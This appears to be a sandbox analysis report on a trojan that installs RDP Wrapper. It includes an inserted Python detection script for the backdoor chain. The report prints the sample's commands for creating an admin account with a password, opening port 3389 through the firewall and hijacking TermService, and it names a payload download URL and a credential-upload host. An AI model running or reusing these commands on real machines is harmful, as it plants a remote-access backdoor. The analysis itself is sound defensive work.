
Windows Analysis Report
hloRQZmlfg.exe

Overview

General Information

Sample name: hloRQZmlfg.exe (renamed because the original name is a hash value)
Original sample name: cee4e023e6afaaa51f600caec3469215.exe
Analysis ID: 1528586
MD5: cee4e023e6afaaa51f600caec3469215
SHA1: bf2ceff1f19f09a70863d1f8c7be0fa9662b3b04
SHA256: da52143dd6a13c1ea3e24e735f64938830e2a3160ae08989629a43e5020d1173
Tags: 32, exe, trojan

Detection

RDPWrap Tool
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • hloRQZmlfg.exe (PID: 2444 cmdline: "C:\Users\user\Desktop\hloRQZmlfg.exe" MD5: CEE4E023E6AFAAA51F600CAEC3469215)
    • cmd.exe (PID: 432 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 5368 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 1036 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 504 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 1564 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 2344 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 2112 cmdline: "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1980 cmdline: net user RDPUser_1e47a393 GEdtvn58rfdr /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 5592 cmdline: C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 4700 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6464 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 4268 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 6712 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 1856 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 2464 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1628 cmdline: net localgroup "Administrators" RDPUser_1e47a393 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6356 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • WerFault.exe (PID: 1512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
No configs have been found
Source | Rule | Description | Author
hloRQZmlfg.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000008.00000000.1434233686.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security
(3 further memory-dump entries were collapsed in the captured report)

Source | Rule | Description | Author
0.0.hloRQZmlfg.exe.880000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
8.2.RDPWInst.exe.400000.0.unpack | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security
8.2.RDPWInst.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
8.0.RDPWInst.exe.400000.0.unpack | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security
8.0.RDPWInst.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

System Summary

Source: Network Connection; Author: Markus Neis; Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\hloRQZmlfg.exe, Initiated: true, ProcessId: 2444, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49711
Source: Registry Key set; Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali; Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 1564, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
Source: Process started; Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community); Data: Command: net user RDPUser_1e47a393 GEdtvn58rfdr /add, CommandLine: net user RDPUser_1e47a393 GEdtvn58rfdr /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2112, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_1e47a393 GEdtvn58rfdr /add, ProcessId: 1980, ProcessName: net.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 432, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 5368, ProcessName: net.exe
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 432, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 5368, ProcessName: net.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T03:23:43.830864+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 104.26.12.205 | 80 | TCP
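The process tree and the Sigma hits above document one chain: a local account is created with net.exe, added to Administrators, an inbound firewall rule for TCP 3389 is added with netsh, TermService's ServiceDll is repointed to rdpwrap.dll, and the sample itself opens an outbound connection to port 3389. As an added example (not code from the Joe Sandbox report, from Joe Security or from the sample), the following Python encodes that chain as Sigma-style checks and runs them over Sysmon-like events. The events are constructed from the report's process tree and Sigma data plus one benign control; field names follow Sysmon (EventID 1/3/13, Image, CommandLine, TargetObject, Details, DestinationPort). The three Sigma titles that fired in this report are reused as rule names; the other two rule names, the abbreviated allowlist of RDP clients and the verdict thresholds are this example's own assumptions.

```python
"""Added example (not from the report or the sample): Sigma-style checks for the
RDP-backdoor chain, run over Sysmon-like events built from the report's process tree."""
import re

# Sample events constructed from the report. EventID follows Sysmon:
# 1 = process create, 3 = network connect, 13 = registry value set.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 5368, "Image": r"C:\Windows\SysWOW64\net.exe",
     "CommandLine": "net user"},                      # enumeration only, must not fire
    {"EventID": 1, "ProcessId": 1980, "Image": r"C:\Windows\SysWOW64\net.exe",
     "CommandLine": "net user RDPUser_1e47a393 GEdtvn58rfdr /add"},
    {"EventID": 1, "ProcessId": 1628, "Image": r"C:\Windows\SysWOW64\net.exe",
     "CommandLine": 'net localgroup "Administrators" RDPUser_1e47a393 /add'},
    {"EventID": 1, "ProcessId": 1856, "Image": r"C:\Windows\SysWOW64\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="RDP" dir=in '
                    'action=allow protocol=tcp localport=3389'},
    {"EventID": 13, "ProcessId": 1564,
     "Image": r"C:\Users\user\AppData\Local\Temp\RDPWInst.exe",
     "TargetObject": r"HKLM\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll",
     "Details": r"%ProgramFiles%\RDP Wrapper\rdpwrap.dll"},
    {"EventID": 3, "ProcessId": 2444, "Image": r"C:\Users\user\Desktop\hloRQZmlfg.exe",
     "DestinationIp": "8.46.123.33", "DestinationPort": 3389, "Initiated": True},
    # Constructed benign control (not from the report): a real RDP client.
    {"EventID": 3, "ProcessId": 9999, "Image": r"C:\Windows\System32\mstsc.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 3389, "Initiated": True},
]

# Assumption: abbreviated allowlist; the public Sigma rule carries a longer list.
RDP_CLIENTS = {"mstsc.exe", "rdcman.exe", "mremoteng.exe", "mremote.exe"}
NET_IMAGES = {"net.exe", "net1.exe"}


def _image_name(ev):
    return ev.get("Image", "").rsplit("\\", 1)[-1].lower()


def rule_new_user(ev):
    """Sigma 'New User Created Via Net.EXE'. Also extracts the account and
    password from the command line so responders know what to revoke."""
    if ev.get("EventID") != 1 or _image_name(ev) not in NET_IMAGES:
        return None
    m = re.search(r"\buser\s+(?P<user>[^\s/]+)(?:\s+(?P<pw>[^\s/]\S*))?\s+/add\b",
                  ev.get("CommandLine", ""), re.I)
    if not m:
        return None
    return {"rule": "New User Created Via Net.EXE", "pid": ev["ProcessId"],
            "user": m["user"], "password": m["pw"]}


def rule_admin_group(ev):
    """Assumed rule name. Matches the English group name only; a localized
    name or the SID S-1-5-32-544 would need an extra pattern."""
    if ev.get("EventID") != 1 or _image_name(ev) not in NET_IMAGES:
        return None
    m = re.search(r'\blocalgroup\s+"?administrators"?\s+(?P<user>[^\s/]+)\s+/add\b',
                  ev.get("CommandLine", ""), re.I)
    if not m:
        return None
    return {"rule": "Local Administrators Group Modified Via Net.EXE",
            "pid": ev["ProcessId"], "user": m["user"]}


def rule_rdp_firewall(ev):
    """Assumed rule name: netsh adds an inbound allow rule for TCP 3389."""
    if ev.get("EventID") != 1 or _image_name(ev) != "netsh.exe":
        return None
    cl = ev.get("CommandLine", "").lower()
    needed = ("advfirewall", "add rule", "dir=in", "action=allow", "localport=3389")
    if not all(tok in cl for tok in needed):
        return None
    return {"rule": "RDP Inbound Firewall Rule Added Via Netsh", "pid": ev["ProcessId"]}


def rule_termservice_dll(ev):
    """Sigma 'RDP Sensitive Settings Changed': TermService's ServiceDll pointing
    anywhere but the stock termsrv.dll is RDP Wrapper or a similar hijack."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "").lower()
    if not target.endswith(r"\services\termservice\parameters\servicedll"):
        return None
    if ev.get("Details", "").lower().endswith(r"\system32\termsrv.dll"):
        return None
    return {"rule": "RDP Sensitive Settings Changed", "pid": ev["ProcessId"],
            "servicedll": ev.get("Details")}


def rule_outbound_rdp(ev):
    """Sigma 'Outbound RDP Connections Over Non-Standard Tools'."""
    if ev.get("EventID") != 3 or not ev.get("Initiated") or ev.get("DestinationPort") != 3389:
        return None
    if _image_name(ev) in RDP_CLIENTS:
        return None
    return {"rule": "Outbound RDP Connections Over Non-Standard Tools",
            "pid": ev["ProcessId"], "dest": ev.get("DestinationIp")}


RULES = (rule_new_user, rule_admin_group, rule_rdp_firewall, rule_termservice_dll, rule_outbound_rdp)
BACKDOOR_CHAIN = {"New User Created Via Net.EXE", "Local Administrators Group Modified Via Net.EXE",
                  "RDP Inbound Firewall Rule Added Via Netsh", "RDP Sensitive Settings Changed"}


def evaluate(events):
    """Run every rule over every event and return the findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def verdict(findings):
    """One rule alone is 'suspicious'; the full account + admin + firewall +
    ServiceDll chain is the RDP backdoor this report documents."""
    hit = {f["rule"] for f in findings}
    if BACKDOOR_CHAIN <= hit:
        return "rdp_backdoor"
    return "suspicious" if hit else "clean"


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("verdict:", verdict(found))
```

The credential extraction is deliberate: the report captures a POST to hansgborn.eu/receive.php and the assembly's member names include SendCredentials, so the user name and password on the `net user ... /add` command line are the backdoor credentials a responder has to revoke, not just an artefact of the detection.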

AV Detection

Source: hloRQZmlfg.exe | Avira: detected
Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | Virustotal: Detection: 22%
Source: http://147.45.44.104 | Virustotal: Detection: 20%
Source: C:\Program Files\RDP Wrapper\rdpwrap.dll | ReversingLabs: Detection: 54%
Source: C:\Program Files\RDP Wrapper\rdpwrap.dll | Virustotal: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Virustotal: Detection: 77%
Source: hloRQZmlfg.exe | ReversingLabs: Detection: 63%
Source: hloRQZmlfg.exe | Virustotal: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Joe Sandbox ML: detected
Source: hloRQZmlfg.exe | Joe Sandbox ML: detected
Source: hloRQZmlfg.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: hloRQZmlfg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.pdbIs>b source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.Xml.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressedlB source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: costura.costura.pdb.compressed source: hloRQZmlfg.exe
Source: Binary string: System.Configuration.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rdpclip.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.Configuration.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: \mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
Source: Binary string: tem.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER91CD.tmp.dmp.38.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.DirectoryServices.pdb4 source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.Management.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: rdpclip.pdbJ source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
Source: Binary string: mscorlib.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.Management.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: HPJo0C:\Windows\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919019826.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
Source: Binary string: System.Core.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<>u__2Func`2Dictionary`2ToInt64<Main>d__5get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderManagementObjectSearcherResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatManagementBaseObjectManagementObjectSelectBegin
Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: hloRQZmlfg.exe
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER91CD.tmp.dmp.38.dr
Source: Binary string: 00000000000000000400000000000000g.PDB source: hloRQZmlfg.exe, 00000000.00000002.1923069816.0000000006B90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_004092D8 FindFirstFileW,FindClose,8_2_004092D8
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0040F73C FindFirstFileW,FindClose,8_2_0040F73C
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,8_2_00408EB9

Networking

Source: Yara match | File source: 8.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1434308891.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RDPWInst.exe PID: 1564, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.8:49711 -> 8.46.123.33:3389
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 08 Oct 2024 01:23:04 GMT
    Content-Type: application/octet-stream
    Content-Length: 1785344
    Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
    Connection: keep-alive
    Keep-Alive: timeout=120
    ETag: "66f55533-1b3e00"
    X-Content-Type-Options: nosniff
    Accept-Ranges: bytes
